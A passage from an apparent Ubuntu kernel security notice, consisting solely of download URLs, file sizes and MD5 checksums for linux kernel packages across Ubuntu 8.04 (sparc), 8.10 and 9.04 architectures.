http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb Size/MD5: 14090906 2d868fdedfc320b2239dbf301790d1dc http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb Size/MD5: 13802896 bf6e9b86cbdede26fd89061b10296551 http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_sparc.deb Size/MD5: 750358 2aa64567f87f3e01794a2c86529da23d http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 270052 0ba83932dbed8aeaf6ddd3a29b692a46 http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 190274 e71570e211349110b3e422c4be949ad2 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 262746 5945be1dee0f68cc7c2accaf043bc050 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 1385732 1e777b3f2817abf6b080c0716332bbd5 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 175218 97800c61086265b7ec2e905295897e5a http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 122096 951902334238b51aa9b172b78962db10 http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 40402 c630c56f90c33e2bd29d18af59670427 http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 48062 599c33d62648436711413f7d36da2d18 http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 8700 5d3347aa29bdfac095254b435ed40d98 http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 60398 53c6a79c562b197f78a7e1fdb4e77e95 http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 106764 9889da01d9805293d43cab0fd63ffeec http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 1001728 2fe7e877334ddd3cf236f6e98f5f46fe http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 9512 be22a95339bad90349084fa441b1471f http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 391164 43cbe127ea4d0b428ac38c360e235cb3 http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 75858 d3fd8c3a8134018d37ddc66b7fb0711d Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.diff.gz Size/MD5: 3181140 f341f37430b19a4815761da90e63e255 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.dsc Size/MD5: 1491 348bdb8051f6821a99b6e0725c2aca64 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-14.35_all.deb Size/MD5: 3489746 1ff47091f292a7388a12f08f9dc8f8b7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14_2.6.27-14.35_all.deb Size/MD5: 5793886 6b12bcd8a9d7fbb597c13d0aa0d285bf http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-14.35_all.deb Size/MD5: 52077688 28412f9128132c91c15915a3d5812093 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 36522 304d150ef4d9a9db9695c2ea3eddf798 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 265178 c0cedca8f9af22d7d35a6f5331e64f46 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 53460 164d97bf182cdc710089336701669026 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 43068 27182ab8ec89343ddb1acaadb79d20a8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 52322 615253a966a6cfb75cde1ea2e74cdcfb http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 89740 8ed1b79d7e290f7bf3cb49f50907e370 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 38172 56c5bfbb21825a4fa74292c63532e201 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 676692 265d0d3fd047797b08261901f3cb50d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 158538 b27457d63fe234182a931c857b64d242 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 46344 f4e9b955dc853195fd05ecae5f140794 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 154248 ad469c83e50590ada6c4b399a6d69854 http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 312772 95e8ea1f4626ae7ced5c93597fbd8af0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 2602274 23d7c86bd8d4ad26d754b97a428b74d4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_amd64.deb Size/MD5: 660580 6c6df3fe5e9f36c47392b8df503fb996 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_amd64.deb Size/MD5: 660584 05bb6f130a1faac0e47c59a64cb59e41 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_amd64.deb Size/MD5: 23065618 fe985c117c3b6faee48830f64cabf971 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_amd64.deb Size/MD5: 23071172 a9d6617828de879a1ef4a68610f06e43 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_amd64.deb Size/MD5: 10464288 f91fdb8992629a5ae82cbcb2d383b8e7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_amd64.deb Size/MD5: 673298 fe94d2d76e3a5dce812d7d8a597637a1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 434636 6fe6ed3dc5c57e5a876f2c6c6c7fbb88 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 186386 338f1bad9040bf0c78ee9397de9398b0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 275414 4a5d4c3690aedd96e3eee3d922d73728 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 1809338 6afa319ea3d9f91e4d16629b86afb1b6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 151300 cdf306368201a053d740b4d77bf62c02 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 194010 d7ed2a96bbd6dcfa75c163511c8b4f7c http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 168054 27dbc834cddb14ce830806e769efb0b6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 36432 95637deca9859881af3edf3db8e06ccc http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 83440 e97ed7ed724ca8c518927601f6b433b9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 71986 1c4c570c1fe15e5cebad90d8a93cf70f http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 23240 ebaa5d5263395e8517ea82ae3b92ddfc http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 9012 f865b88210a4c54d8fdc79a9cfbdf4a0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 68492 6994b7e19338405c0e127924e67e516d http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 110292 8e81e11a44a41f94fef4dff4e59e3da3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 1275410 34848383b66939762660048e268e8441 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 47594 9181c757204f49f4d0dac390e83f02a4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 13480 a51476c745872d0858d9b7033a64ea9f http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 393508 9500d323c74c9a330c85183c1686ff49 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 200788 c5ed4008f970210bb982f80cbce591e4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb Size/MD5: 13620 2fc4b4f188f9218932d0490308507835 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 33922 f40a1e72d099b64c586a6db641443044 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 244642 b720012479a1cbe6ba08d28302584fc9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 55394 90c1f139ebe83c6d6d8b1a1fc1061297 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 41218 c1b7874af183c54e95df8d57557aa7c0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 48654 dfb3c0359053a662017fd9dea0f840ab http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 86896 3e594eaa10f4598f2c050daf5ee208e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 34058 c5f4fc9d0f61e279e0f6a9b351545b27 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 675184 eac37d6873c317fec9dbc41af85ce84f http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 158298 fdb6996d620940e986f9e809a1061414 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 43598 8d56f44e1e6c01610509b5cdc9ea5f42 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 145120 47f331154c2773e7861a63965661123a http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 301946 d7980f5869e46243a45b37625ad61afe http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 2435224 46b565365b11d793768f04f50a4c248b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_i386.deb Size/MD5: 643392 3e61d3633116618454601e745e24a863 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_i386.deb Size/MD5: 644726 37a677e1e3004e6b42d0958beeb0fda7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_i386.deb Size/MD5: 23478050 04856487eac811aebdd2a30416889f40 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_i386.deb Size/MD5: 23600374 2b9a4093fbdd02dbd054cbe8ca2384f1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_i386.deb Size/MD5: 10108412 0d4c0bd4e94cac0ea3b384b6b1d29cb5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_i386.deb Size/MD5: 673308 dc76499e326c2f5c2e10b547241ed770 http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 432904 836dfe4f7fd217c3d6b4e50ee27ff5ec http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 171144 e01935798941dc8722f25c9e499d7dba http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 263706 ad942f31cb448980c110c5d65b4c5938 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 1993126 9e48f8f227a345c72ae76263b3acc41e http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 150922 d45e54c03e6524f7409d8ffe6ccbc1fe http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 183850 26ff7871dda8a29516eb04951e395500 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 157722 7cefa9c1e1abd9574daa5a2732c8d43b http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 34498 a323c4253a702888a9ee866bafcac9e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 78252 3306e0596c6ec6a941906ec5cf1b5896 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 86172 14f820994a04b74bacc55f908ced747a http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 51176 929ace31f9151a14f646711b57141335 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 8794 c6ff3050c0e8d61f69978e3a64f3afc0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 64308 ab5438618e09f3747c9cabe4d2202d42 http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 102010 d66cf8423068745b1896a2d37087ea57 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 1449250 cc24f0d8b7411f15f0b3704c92c73719 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 44514 0763f6eeda9cf0971a5145eeca31a37b http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 12642 4142729eb596aefe6b55a3c91b537aa7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 372528 2ec016366a3c65b130470af25b4f4cd9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 189698 577f8d2648589a2620fe4917bcd90e4a http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb Size/MD5: 12992 aaf90b0f25f26915752e0d01ffdf1404 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.diff.gz Size/MD5: 7052018 c30f6c12f534fb270e77a8db16658c00 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.dsc Size/MD5: 1988 c31e8f14e5353913483bcbe5134a221a http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-13.45_all.deb Size/MD5: 3630660 dff37123aa2a0a01813aaafa113efeaa http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13_2.6.28-13.45_all.deb Size/MD5: 8694158 d568990611704c5022f17a406bba56da http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-13.45_all.deb Size/MD5: 56896726 2218180442fe2265c4a383718103d24b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 234530 8ca4ab91f04156b591af5e036a9d9eaf http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 44110 3d35edf87a693b4aec248c4e110db223 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 43326 8b5f1e9917275cb49fd5cdc5fe7c372c http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 51102 a1b090802ce4589182c26704db51e79a http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 89946 692cdd4f68027d91736aee9507a279a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 37992 40f149752511e8e7d4b527bd321f5f61 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 521610 a346bd312d8eed61e8bb96fb59f3b9b9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 125632 86429c19731c1bbc4fc7025d4659f4e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 58050 dbb7ceb698b6e40a9429b35804416265 http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 312206 2bd5e6bd4338e51c72d349a40a24afb9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 3867978 7532ceaadca5ac062476c9a058e87f87 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_amd64.deb Size/MD5: 684590 ce636ed44071caf1eb5696a5b4cd3d52 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_amd64.deb Size/MD5: 684602 67c72e9124b19974c39f55341d293d4f http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_amd64.deb Size/MD5: 24250596 54189eb7095f154663e12fcbd03e3052 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_amd64.deb Size/MD5: 24255096 11079badc74f668bfa9299a94eee9500 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_amd64.deb Size/MD5: 10522290 889f00238ab9579a1a3787b6f4093bba http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_amd64.deb Size/MD5: 761032 20f696493a51b361c8211cd3a99773a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 215158 e7434a687dec03b384f88e8e86870b2d http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 189390 cd7116d69deef0ccd449097583b27125 http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 29396 de5e69d2393ad59f85a530a3a1076f03 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 274128 a4bb104369c8be8748a38ec66a6649b1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 1826044 25d1a4452606ab450f214afd2c6da482 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 163490 edffca1a4f08889ab04638134e70bdfa http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 194758 84976648caa181490b9c748f7672e20c http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 152946 38f0b1e429efc2993fb2f0346daf98d2 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 36490 09b7bf2b970fab395adc80da34772183 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 5842 6a537fc3a2af29ba6fd981ce8b2b19f0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 72132 2416b9382cc51b3b1c424d52bbf379b0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 22716 d5f4dc6ca66de6c6044e2fcfcf9783c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 8878 58927a3e2b4abbb9a3e0e19c969b701a http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 47470 8cd84b96c9d3b1e32b3e7d29042b4a91 http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 15622 5b3599e51e3513f458430702ba57410a http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 1272842 175bd4440eb113fa0b72b1c3897457c4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 47218 3bf3faa60421de087af2696985c361eb http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 72626 f431e2290ae3347326ff8b3fc5b5bf98 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 126946 c82470ee359a4f8d7879367739e73f1d http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb Size/MD5: 13472 0299bdd96f706adde62bcbf1fe873527 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 215716 af09e22b5eededba6f06bbce4b6f7f6e http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 46662 cbb33d90c53ae6c5a277c9f4402188e1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 41344 c369ce39d1595df751bf81a7ca1d4831 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 47378 092cfe8af282c15f332902a0295fe1b4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 86848 c2b5e966fc9e4476ab1b6c6fde5bb7a5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 33574 e7b69e22af4eb33299e772769f464803 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 525474 11f2df9f8143a48c6395b3b51fbd964e http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 125494 feafd7e08878356c984098698d832b72 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 54864 7bf17f733cf036e0492643870dbc439a http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 300874 8e5766303f17caafeffc6db2d3590487 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 3741754 f62502087f0d206a7c43856618b63099 